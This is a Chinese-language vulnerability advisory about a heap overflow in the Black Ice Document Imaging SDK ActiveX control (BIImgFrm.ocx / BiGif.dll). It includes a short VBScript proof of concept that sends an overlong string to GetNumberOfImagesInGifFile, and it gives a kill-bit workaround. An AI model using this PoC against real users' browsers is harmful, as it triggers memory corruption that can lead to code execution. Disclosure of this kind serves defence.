发布日期：2008-07-15
更新日期：2008-07-17

受影响系统：

Black Ice Document Imaging SDK/ActiveX 10.95

描述：

---

BUGTRAQ  ID: 30243

Document Imaging SDK/ActiveX是用于帮助开发人员和程序员创建图形处理应用的软件开发工具。

Document Imaging SDK/ActiveX控件的BiGif.dll文件中没有正确地验证对OpenGifFile()函数的输入参数，如果用户受骗访问了恶意网页并向BIImgFrm Control ActiveX控件（BIImgFrm.ocx）的GetNumberOfImagesInGifFile()方式传送了超长字符串的话，就会触发堆溢出，导致执行任意指令。

<*来源：r0ut3r （writ3r@gmail.com）
  
  链接：http://secunia.com/advisories/31095/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>

<script language='vbscript'>
Sub Boom
    buff = String(14356, "A")
    test.GetNumberOfImagesInGifFile buff

End Sub
</script>
<input type=button onclick=Boom() value='Boom?'>

建议：

---

临时解决方法：

* 为CLSID：79956462-F148-497F-B247-DF35A095F80B设置kill bit。

厂商补丁：

Black Ice
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.blackice.com/barcode.htm

浏览次数：2405
严重程度：0（网友投票）